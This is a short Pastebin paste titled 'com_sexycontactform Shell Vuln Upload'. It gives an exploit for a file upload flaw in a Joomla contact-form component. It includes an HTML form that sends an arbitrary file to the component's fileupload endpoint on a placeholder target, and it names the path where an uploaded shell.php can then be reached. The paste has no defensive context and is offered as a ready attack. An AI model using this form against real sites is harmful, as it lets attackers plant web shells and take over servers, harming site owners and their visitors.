Advertisement
Kyfx

com_sexycontactform

Feb 20th, 2015
379
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.55 KB | None | 0 0
  1. Exploit name= com_sexycontactform Shell Vuln Upload
  2. =============================================
  3. Script CSRF :
  4. Code:
  5. <form method="POST" action="http://www.target.com/components/com_sexycontactform/fileupload/index.php"
  6. enctype="multipart/form-data">
  7. <input type="file" name="files[]" /><button>Upload</button>
  8. </form>
  9. Exploit : components/com_sexycontactform/fileupload/index.php
  10. http://www.targetcom/components/com_sexycontactform/fileupload/files/shell.php (root/symlink)
  11. ***************************************************************************
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement